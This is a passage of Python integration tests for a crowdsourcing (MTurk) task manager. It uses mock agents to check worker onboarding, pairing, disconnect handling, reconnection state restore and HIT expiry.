def test_duo_with_onboarding(opt, server_url):
"""Tests a solo task with onboarding to make sure the task doesn't begin
until both agents are ready to go. Also tests that a third agent is not
able to join after the conversation starts, as the HIT should be expired
"""
global completed_threads
print('{} Starting'.format(DUO_ONBOARDING_TEST))
opt['task'] = DUO_ONBOARDING_TEST
hit_id = FAKE_HIT_ID.format(DUO_ONBOARDING_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(DUO_ONBOARDING_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(DUO_ONBOARDING_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(DUO_ONBOARDING_TEST, 2)
# Repeat worker_id on purpose to test is_sandbox matching of unique workers
worker_id_2 = FAKE_WORKER_ID.format(DUO_ONBOARDING_TEST, 1)
assign_id_3 = FAKE_ASSIGNMENT_ID.format(DUO_ONBOARDING_TEST, 3)
worker_id_3 = FAKE_WORKER_ID.format(DUO_ONBOARDING_TEST, 3)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
connection_id_3 = '{}_{}'.format(worker_id_3, assign_id_3)
last_command = None
message_num = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, True))
world_thread.daemon = True
world_thread.start()
# create and set up the two agents
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_3 = MockAgent(opt, hit_id, assign_id_3,
worker_id_3, task_group_id)
def msg_callback_3(packet):
nonlocal last_command
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
message_handler_3 = \
make_packet_handler(test_agent_3, dummy, dummy, msg_callback_3)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_1.wait_for_alive()
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
check_new_agent_setup(test_agent_2, mturk_manager)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
check_new_agent_setup(test_agent_1, mturk_manager)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
check_new_agent_setup(test_agent_2, mturk_manager)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Start heartbeats
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run agent_1 through onboarding
assert test_agent_1.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_1.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_ONBOARDING)
test_agent_1.send_message('Onboard2', dummy)
wait_for_state_time(2, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Run agent_2 through onboarding
assert test_agent_2.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_2.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_ONBOARDING)
test_agent_2.send_message('Onboard2', dummy)
wait_for_state_time(4, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
wait_for_state_time(2, mturk_manager)
first_agent = None
second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
# Attempt to connect with agent 3
assert not mturk_manager.accepting_workers, \
'Manager shouldn\'t still be accepting workers after a conv started'
test_agent_3.setup_socket(server_url, message_handler_3)
test_agent_3.wait_for_alive()
wait_for_state_time(2, mturk_manager)
assert last_command.data['text'] == data_model.COMMAND_EXPIRE_HIT, \
        'HIT was not immediately expired when the third agent connected'
# Finish the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(assign_state_1.messages) == 3, \
        'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_2.messages) == 3, \
        'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert mturk_manager_assign_1.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_3), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[DUO_ONBOARDING_TEST] = True
def test_duo_no_onboarding(opt, server_url):
"""Tests duo task to completion, as well as disconnect in
waiting to ensure the agent is marked disconnected and removed from pool.
It also tests disconnect in transitioning to a world to ensure the other
agent returns to waiting
"""
global completed_threads
print('{} Starting'.format(DUO_NO_ONBOARDING_TEST))
opt['task'] = DUO_NO_ONBOARDING_TEST
opt['count_complete'] = True
hit_id = FAKE_HIT_ID.format(DUO_NO_ONBOARDING_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(DUO_NO_ONBOARDING_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(DUO_NO_ONBOARDING_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(DUO_NO_ONBOARDING_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(DUO_NO_ONBOARDING_TEST, 2)
assign_id_3 = FAKE_ASSIGNMENT_ID.format(DUO_NO_ONBOARDING_TEST, 3)
worker_id_3 = FAKE_WORKER_ID.format(DUO_NO_ONBOARDING_TEST, 3)
assign_id_4 = FAKE_ASSIGNMENT_ID.format(DUO_NO_ONBOARDING_TEST, 4)
worker_id_4 = FAKE_WORKER_ID.format(DUO_NO_ONBOARDING_TEST, 4)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
connection_id_3 = '{}_{}'.format(worker_id_3, assign_id_3)
connection_id_4 = '{}_{}'.format(worker_id_4, assign_id_4)
message_num = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# create and set up an agent to disconnect when paired
test_agent_3 = MockAgent(opt, hit_id, assign_id_3,
worker_id_3, task_group_id)
def msg_callback_3(packet):
nonlocal message_num
nonlocal test_agent_3
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_3.wants_to_send = True
message_handler_3 = make_packet_handler_cant_task(
test_agent_3,
dummy,
dummy,
msg_callback_3
)
test_agent_3.always_beat = True
test_agent_3.setup_socket(server_url, message_handler_3)
test_agent_3.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_3, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_3 = \
mturk_manager.mturk_workers[worker_id_3].agents[assign_id_3]
assign_state_3 = mturk_manager_assign_3.state
# Start heartbeats for 3
test_agent_3.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Ensure agent 3 is sitting in a waiting world now
assert test_agent_3.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_3.status, AssignState.STATUS_WAITING)
assert len(mturk_manager.worker_pool) == 1, \
'Worker was not entered into pool'
# create and set up an agent to disconnect when returned to waiting
test_agent_4 = MockAgent(opt, hit_id, assign_id_4,
worker_id_4, task_group_id)
def msg_callback_4(packet):
nonlocal message_num
nonlocal test_agent_4
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_4.wants_to_send = True
message_handler_4 = \
make_packet_handler(test_agent_4, dummy, dummy, msg_callback_4)
test_agent_4.setup_socket(server_url, message_handler_4)
test_agent_4.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_4, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_4 = \
mturk_manager.mturk_workers[worker_id_4].agents[assign_id_4]
assign_state_4 = mturk_manager_assign_4.state
# Start heartbeats for 4
test_agent_4.always_beat = True
test_agent_4.send_heartbeat()
assert len(mturk_manager.worker_pool) == 0, \
'Workers were not removed from pool when assigned to a world'
check_status(assign_state_3.status, AssignState.STATUS_ASSIGNED)
# Wait for the world to give up on waiting
wait_for_state_time(WORLD_START_TIMEOUT + 2.5, mturk_manager)
# Assert that the agent is back in the waiting world
check_status(assign_state_4.status, AssignState.STATUS_WAITING)
assert len(mturk_manager.worker_pool) == 1, \
        'Worker was not returned to the pool'
# Assert that the disconnected agent is marked as so
wait_for_state_time(2, mturk_manager)
check_status(assign_state_3.status, AssignState.STATUS_DISCONNECT)
# Wait for 4 to disconnect as well
test_agent_4.always_beat = False
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
assert len(mturk_manager.worker_pool) == 0, \
'Workers were not removed from pool when disconnected'
check_status(assign_state_4.status, AssignState.STATUS_DISCONNECT)
# create and set up the first successful agent
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Start heartbeats for 1
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Set up the second agent
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Start heartbeats for 2
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
    check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
first_agent = None
second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(assign_state_1.messages) == 3, \
        'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_2.messages) == 3, \
        'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert mturk_manager_assign_1.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_3), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_4), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[DUO_NO_ONBOARDING_TEST] = True
def test_duo_valid_reconnects(opt, server_url):
"""Tests reconnects during the task which should reload the conversation
state, as well as completing a task after a reconnect.
"""
global completed_threads
print('{} Starting'.format(DUO_VALID_RECONNECT_TEST))
opt['task'] = DUO_VALID_RECONNECT_TEST
hit_id = FAKE_HIT_ID.format(DUO_VALID_RECONNECT_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(DUO_VALID_RECONNECT_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(DUO_VALID_RECONNECT_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(DUO_VALID_RECONNECT_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(DUO_VALID_RECONNECT_TEST, 2)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
message_num = 0
refresh_was_valid = False
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# create and set up the first agent
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
nonlocal refresh_was_valid
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif packet.data['text'] == data_model.COMMAND_RESTORE_STATE:
messages = packet.data['messages']
assert messages[0]['text'] == expected_messages[0], 'first ' \
'message in restore state {} not as expected {}'.format(
messages[0], expected_messages[0]
)
assert messages[1]['text'] == expected_messages[1], 'second ' \
'message in restore state {} not as expected {}'.format(
messages[1], expected_messages[1]
)
assert packet.data['last_command']['text'] == \
data_model.COMMAND_SEND_MESSAGE, 'restore state didn\'t '\
'include command to send a new message'
refresh_was_valid = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Start heartbeats for 1
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Set up the second agent
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
nonlocal refresh_was_valid
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif packet.data['text'] == data_model.COMMAND_RESTORE_STATE:
messages = packet.data['messages']
assert messages[0]['text'] == expected_messages[0], 'first ' \
'message in restore state {} not as expected {}'.format(
messages[0], expected_messages[0]
)
assert messages[1]['text'] == expected_messages[1], 'second ' \
'message in restore state {} not as expected {}'.format(
messages[1], expected_messages[1]
)
assert packet.data['last_command']['text'] == \
data_model.COMMAND_SEND_MESSAGE, 'restore state didn\'t '\
'include command to send a new message'
refresh_was_valid = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Start heartbeats for 2
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
first_agent = None
second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
# Simulate a refresh, msg callback will verify it was valid
first_agent.conversation_id = None
first_agent.send_alive()
wait_for_state_time(4, mturk_manager)
assert refresh_was_valid, 'Information sent on refresh was invalid'
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert mturk_manager_assign_1.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[DUO_VALID_RECONNECT_TEST] = True
def test_duo_one_disconnect(opt, server_url):
"""Tests whether disconnects properly cause a task to fail and let the
non-disconnecting partner complete the HIT. Also tests reconnecting after
a partner disconnect or after a disconnect.
"""
global completed_threads
print('{} Starting'.format(DUO_ONE_DISCONNECT_TEST))
opt['task'] = DUO_ONE_DISCONNECT_TEST
hit_id = FAKE_HIT_ID.format(DUO_ONE_DISCONNECT_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(DUO_ONE_DISCONNECT_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(DUO_ONE_DISCONNECT_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(DUO_ONE_DISCONNECT_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(DUO_ONE_DISCONNECT_TEST, 2)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
message_num = 0
partner_disconnects = 0
self_disconnects = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
MTURK_DISCONNECT_MESSAGE
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# create and set up the first agent
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
nonlocal partner_disconnects
nonlocal self_disconnects
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif packet.data['text'] == data_model.COMMAND_INACTIVE_DONE:
partner_disconnects += 1
elif packet.data['text'] == data_model.COMMAND_INACTIVE_HIT:
self_disconnects += 1
elif test_agent_1.conversation_id is not None and \
test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Start heartbeats for 1
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Set up the second agent
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
nonlocal partner_disconnects
nonlocal self_disconnects
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif packet.data['text'] == data_model.COMMAND_INACTIVE_DONE:
partner_disconnects += 1
elif packet.data['text'] == data_model.COMMAND_INACTIVE_HIT:
self_disconnects += 1
elif test_agent_2.conversation_id is not None and \
test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_2.wait_for_alive()
wait_for_state_time(2.5, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Start heartbeats for 2
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(2.5, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
first_agent = None
second_agent = None
mturk_first_agent = None
mturk_second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
